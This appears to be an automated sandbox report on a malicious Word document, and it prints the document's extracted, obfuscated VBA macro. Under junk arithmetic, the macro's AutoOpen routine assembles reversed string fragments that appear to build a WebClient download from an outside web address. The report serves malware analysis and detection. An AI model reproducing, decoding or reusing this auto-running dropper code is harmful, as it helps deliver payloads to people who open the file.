Verdict: MALICIOUS
Risk Score: 202
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell() function, a critical-severity heuristic, which indicates an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Dropper.Agent-6545119-0' further supports its classification as a dropper. The primary purpose of the VBA script appears to be executing a secondary payload, although the exact nature of that payload cannot be determined from the provided script excerpt.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6545234-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6545234-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 129128 bytes | ea21cc2f3b6e5e103389dbeb426986dabeb96fcaf77893fa56c9acd6311a31e6 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "RJbLhFwrNmV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub dhMPzR(mNtbGO)
RnRPWA = zzWfH
LMOuji = kbLAs
FOacF = tNjnE + Sgn(69181 - tmjiq - pmZazz + Fix(85516)) - 53970 - CDbl(20641)
qbRWP = 89705
End Sub
Sub WWQNNS(ZKKUlR)
sUPCV = obdMpj
sLmNz = pJMZWc
wAopX = tHwHBT + Sgn(88395 - IvtEY - QjNYwV + Fix(73870)) - 53179 - CDbl(90099)
usaAjo = 73821
pwptuE = tFkhNS
wwDNm = sCERM
MJtti = IFOZo + Sgn(43861 - JnDQBt - NZuczW + Fix(2345)) - 41219 - CDbl(92280)
uYhdsb = 99188
GNFNG = JjZdd
lCXfDn = RvISn
bfQpL = MEEuj + Sgn(53600 - SVSQz - sHBrA + Fix(3210)) - 48352 - CDbl(10065)
iQwuR = 8512
End Sub
Sub ttrNMQ(hHrDDU)
wfLvvB = oPnmL
WnwlKv = cYZjLb
UjJzV = TjlnzW + Sgn(5573 - FiDbA - OtLFt + Fix(15682)) - 65150 - CDbl(32553)
FbjUd = 10618
GpRbj = CIlosh
uVILK = bXDEN
CJfLQ = YzAXN + Sgn(19779 - lbqCU - PAufj + Fix(37335)) - 46428 - CDbl(19470)
ijClD = 47916
End Sub
Sub Autoopen()
On Error Resume Next
dWwVmT = WWIzmY
kUjzzC = ivssr
VTUcG = HwTGwT + Sgn(91309 - XIbVl - mtMTmG + Fix(43607)) - 40397 - CDbl(98482)
EduPMC = 3758
SzSziNJbYb (rmRkQO + oRbQafbovOfE + jCjkVU)
GGSbH = pAdmw
BVYjGV = viwTC
zjGDnk = GhWnzk + Sgn(89706 - qrJil - NPHWd + Fix(28717)) - 29869 - CDbl(47255)
HnPwKS = 67369
End Sub
Sub qCVlUw(iWaFEm)
oQFkUz = JVNioP
hlkiH = TcPmsQ
nHnJT = Rwzta + Sgn(96295 - PjjHDf - kBkqXz + Fix(85349)) - 42825 - CDbl(22887)
SrDcu = 5642
DOizCi = JkXfnw
iNhlm = zmWNv
wajuHV = wDozmi + Sgn(36918 - hmZMjP - kdWrHj + Fix(70014)) - 33246 - CDbl(84859)
BPjQa = 80732
KJzEu = uDSdQ
zAMWFq = XQNwO
wckSjb = wICZS + Sgn(76852 - ObnpCU - vUoti + Fix(50431)) - 40617 - CDbl(34843)
zNiSz = 75383
End Sub
Sub ljBJD(wnERAr)
cYuuVB = vYEBl
IFMjVs = RBFAKO
VBoMZ = WYZSoz + Sgn(91923 - OMiAYY - taVvHQ + Fix(58553)) - 51206 - CDbl(36007)
jGumtk = 84805
End Sub
Attribute VB_Name = "HIkftuYwwDp"
Sub Ampaca(QROrz)
ZEqAs = cmYQP
NhaXKT = lsswRU
SQbKt = mZTqi + Sgn(92212 - iNnbV - iPttt + Fix(13033)) - 89004 - CDbl(31411)
OjHYj = 66143
End Sub
Function oRbQafbovOfE()
On Error Resume Next
LLOXw = nNjpO
sYERa = puZXiD
AaLmiJ = VhBcN + Sgn(97541 - VbfJDr - XoJPhj + Fix(83050)) - 77248 - CDbl(54200)
dKYwjc = 51850
dLJsi = cGzkn
qBJDa = MNIOKD
SbjLC = CRqwq + Sgn(16570 - hihumW - vDVpnu + Fix(3996)) - 41457 - CDbl(34207)
OAFjQ = 90977
LWsIhsDraYz = crGQAY("KZz4.rXz) )69]Raq", 36947 + 2 - 36947, 36947 + 8 - 36947)
vvhluz = SubCh
NcnPQO = qXHBj
akpDS = jlzqp + Sgn(6496 - DTXtS - nmBmMq + Fix(30310)) - 2239 - CDbl(79201)
XnjEt = 48041
jnDUlz = iBasv
Efncff = XDsljB
YRuKP = PSqHL + Sgn(26741 - jwEvL - BiJYi + Fix(1661)) - 13330 - CDbl(59315)
cuRnk = 61861
mAmvb = crGQAY("odMJG'of'+';'+')e'+'HoeeHo+e'+5r", 35899 + 3 - 35899, 35899 + 25 - 35899)
QHPckU = pfQRIL
zzaQzm = sQJIj
pvqXd = sfzfif + Sgn(65140 - UtNjwT - dzrXkt + Fix(54319)) - 45711 - CDbl(81813)
UEKzt = 79533
SrEksJ = NdBMzw
kWdYAP = GDjflB
piUVTC = BYYBpn + Sgn(66073 - cQLvE - dkBzSI + Fix(22416)) - 78775 - CDbl(46296)
GHDXz = 63817
FPbtHKhdFN = crGQAY("%J7S7+'ot'+9P", 85768 + 3 - 85768, 85768 + 6 - 85768)
fwCiwF = LctDa
TqzsM = SYBtRM
TuhjK = vZjzB + Sgn(1731 - fimpOI - HkQKL + Fix(21640)) - 10803 - CDbl(27840)
iClVw = 71206
HGbkZ = IZsDAZ
KjiLji = bXoBB
dGfPu = TNrsHA + Sgn(39224 - Dbbidr - njsZY + Fix(50266)) - 90292 - CDbl(88970)
SZjBKB = 88354
RQBtAiWMF = crGQAY("qv3;t'+'nei'+'l'+'CbeW'+'.teN.m'+'e.i,", 54403 + 4 - 54403, 54403 + 32 - 54403)
JBGiSr = LLqEzv
XKVpa = pVYYTH
hRThBh = YckUVp + Sgn(33024 - Mjquo - CYjUb + Fix(11762)) - 74820 - CDbl(76822)
iOLRtt = 85549
iYtHNk = zFKCQR
KVOfK = FhKdlo
kGoaFt = VpGzh + Sgn(85892 - lrlTdt - ojailJ + Fix(41832)) - 1065 - CDbl(26882)
VYHHs = 32552
jOOTMLkbG = crGQAY("bwYp'+'S.eHo'+'/mKaFCZh/o'+'tua/lp'+'.notrako'+'rue//:ptth@'+'/p'+'WREU8NQrP", 16656 + 4 - 16656, 16656 + 70 - 16656)
zXBwVO = wRpUq
KIviw = OsTju
bqcIk =
... (truncated)
```